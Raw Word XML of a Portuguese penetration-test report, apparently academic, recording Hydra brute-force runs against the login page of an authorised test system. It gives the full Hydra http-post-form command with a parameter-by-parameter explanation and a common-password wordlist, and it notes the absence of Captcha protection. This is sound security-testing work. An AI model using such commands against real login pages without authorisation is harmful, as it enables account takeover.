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B60" w:rsidRDefault="00F15F82" w:rsidP="00AC10D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15B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 RELATÓRIO DE EXECUÇÃO DOS TESTES </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00902307">
      <w:pPr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Nessa sessão, serão relatados, de forma detalhada, os resultados </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:t>obtidos na execução dos testes em cada iteração planejada. Serão apresentados os passos utilizados para detectar possíveis vulnerabilidades, as vulnerabilidades encontradas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e quais danos estas podem causar caso sejam exploradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15F82" w:rsidRPr="00F15F82" w:rsidRDefault="00F15F82" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast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630433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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>Iteração 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3154F" w:rsidRPr="00F15F82" w:rsidRDefault="00F3154F" w:rsidP="00F3154F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E52521" w:rsidP="00AC10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4.3.1.1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Tela Login - Exploração via Força Bruta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01/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00E52521" w:rsidP="00AC10DC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Duração</w:t>
      </w:r>
      <w:r w:rsidR="002A0DD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> total das sessões executadas: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1</w:t>
      </w:r>
      <w:r w:rsidR="00546F66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hora e 20 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1803" w:rsidRDefault="004E1803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52521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Default="00546F66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Utilizar a ferramenta Hydra, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">abordada no </w:t>
      </w:r>
      <w:r w:rsidR="00F15B60" w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">capítulo </w:t>
      </w:r>
      <w:r w:rsidR="00F15B60" w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00CC3790" w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F15B60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para</w:t>
      </w:r>
      <w:r w:rsidR="003E1ACB" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontrar</w:t>
      </w:r>
      <w:r w:rsidR="00417333">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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por</w:t>
      </w:r>
      <w:r w:rsidR="00417333">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> meio de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CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tentativa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e erro, um login de um usuário e senha válido</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s para </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>acessar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4E1803" w:rsidRPr="00F15F82" w:rsidRDefault="004E1803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2A0DD8" w:rsidP="00AC10D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2A0DD8" w:rsidRPr="00F15F82" w:rsidRDefault="00546F66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Configurar a Hydra, </w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com os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parâmetros</w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D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C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>senha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,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para que ela realize os testes de acesso com força bruta na tela de Login.</w:t>
      </w:r>
      <w:r w:rsidR="00EC2366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A0DD8" w:rsidRPr="00F15F82" w:rsidRDefault="002A0DD8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A0DD8" w:rsidRPr="00F15F82" w:rsidRDefault="00827015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C97F3F" w:rsidRDefault="00EC2366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que o sistema possua </w:t>
      </w:r>
      <w:r w:rsidR="002A0DD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>proteção</w:t>
      </w:r>
      <w:r w:rsidR="00FF6B3E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FF6B3E" w:rsidRPr="004E1803">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Antis</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1803">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pam, como Captcha que impeça a ferramenta automatizada de prosseguir até o fim do teste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4E1803" w:rsidRPr="004E1803" w:rsidRDefault="004E1803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4E1803" w:rsidRPr="004E1803" w:rsidRDefault="005967D5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E1803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C12C3D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Indefinido.</w:t>
      </w:r>
      <w:r w:rsidR="00C12C3D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A ferramenta está esperando 3 parâmetros quando, a tela de Login só utiliza 2 na requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7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E1803" w:rsidRPr="00F15F82" w:rsidRDefault="004E1803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B3CB1" w:rsidRDefault="00FB3CB1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B3CB1" w:rsidRDefault="00FB3CB1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2A0DD8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Inserir um login de usuário válido e possíveis senhas mais comuns utilizadas para acesso de um sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C97F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00C97F3F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C97F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00827015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C97F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00C97F3F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Espera-se que o siste</w:t>
      </w:r>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ma interrompa as sessões</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de testes</w:t>
      </w:r>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>configuradas na ferramenta Hydra</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan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D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A6729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Comando utilizado: hydra -l admin -P forcaBruta IP_do_servidor http-post-form “</w:t>
      </w:r>
      <w:r w:rsidR="00AC10DC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/login.php:login=^USER^:senha=^PASS^:logado=false”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A6729" w:rsidRPr="00F15F82" w:rsidRDefault="000A6729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AC10DC" w:rsidRDefault="00ED180C" w:rsidP="0063043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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>“hydra” executa a ferramenta Hydra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="0063043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 xml:space="preserve">“-l” significa o login utilizado no momento. Nesse caso, deve ser sempre “admin”, pois foi o único usuário válido fornecido para a realização de testes no </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC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AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="0063043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>“-P” aponta para o arquivo contendo as senhas que a H</w:t>
      </w:r>
      <w:r w:rsidR="00B7146E" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ydra tentará utilizar para acessar o sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC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AC10DC" w:rsidRDefault="00B7146E" w:rsidP="0063043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>“</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP_do_servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> é o IP onde está hospedada a aplicação alvo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="00DD5893" w:rsidP="0063043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“http-post-form” informa</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o método utilizado</w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>para fazer a requisição ao servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">do </w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>protocolo</w:t>
      </w:r>
      <w:r w:rsidR="001F5050" w:rsidRPr="00AC10DC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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="0063043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r w:rsidR="00AC10DC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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/login.php:login=^USER^:senha=^PASS^:logado=false”  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC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8C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="00630433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 xml:space="preserve">USER é onde a Hydra deve inserir o </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidR="003745C8" w:rsidRPr="00AC10DC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10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>válido usado na requisição;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00AC10DC" w:rsidRDefault="008C6DC7" w:rsidP="00630433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C10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS é onde a Hydra deve inserir a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>senha</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC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D60336" w:rsidRDefault="005967D5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F71E4B" w:rsidP="00AC10DC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517685" w:rsidRPr="00F15F82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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Todas as sessões </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>de teste</w:t>
      </w:r>
      <w:r w:rsidR="00564674" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s foram executadas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pela Hydra</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F8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64674" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sem nenhum tipo de interrupção por parte do sistema alvo.</w:t>
      </w:r>
      <w:r w:rsidR="00564674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62442F" w:rsidRDefault="0062442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AC10DC" w:rsidRDefault="00AC10D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3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56110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Configurar a ferramenta Hydra para executar </w:t>
      </w:r>
      <w:r w:rsidR="000A6729" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uma s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s utilizando o </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login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“admin”, cadastrado na base de dados do sistema</w:t>
      </w:r>
      <w:r w:rsidR="000A6729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ED180C" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>explorado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. Além disso, usar um dicionário de senhas retiradas da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Lista de Piores Senhas de 2015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da SplashData [1]. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C97F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00C97F3F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97F3F" w:rsidRPr="00F15F82" w:rsidRDefault="00827015" w:rsidP="00827015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564674" w:rsidRPr="00F15F82" w:rsidRDefault="00564674" w:rsidP="00817857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que o sistema possua </w:t>
      </w:r>
      <w:r w:rsidR="000A6729" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>proteção Antis</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pam, como Captcha que impeça a ferramenta automatizada de prosseguir até o fim do teste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A6729" w:rsidRPr="00F15F82" w:rsidRDefault="000A6729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62442F" w:rsidRDefault="0062442F" w:rsidP="00AC10DC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="707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>Comando utilizado:</w:t>
      </w:r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hydra -l admin -P forcaBruta IP_do_servidor http-post-form “</w:t>
      </w:r>
      <w:r w:rsidR="00DD5893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>/login.php:login=^USER^:senha=^PASS^:logado=false” -V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AC10DC" w:rsidP="00AC10D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7260B8" w:rsidRDefault="00ED180C" w:rsidP="0063043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7260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>“hydra” executa a ferramenta Hydra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="0063043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 xml:space="preserve">“-l” significa o login utilizado no momento. Nesse caso, deve ser sempre “admin”, pois foi o único usuário válido fornecido para a realização de testes no </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado</w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="0063043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>“-P” aponta para o arquivo contendo as senhas que a Hydra tentará utilizar para acessar o sistema;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="0063043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>“IP_do_servidor” é o IP onde está hospedada a aplicação alvo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00DD5893" w:rsidP="0063043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“http-post-form” informa</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o método utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>para fazer a requisição ao servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>do protocolo</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00265100" w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="0063043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r w:rsidR="000C72B3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7260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/login.php:login=^USER^:senha=^PASS^:logado=false”  </w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8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265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3261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 xml:space="preserve">USER é onde a Hydra deve inserir o </w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
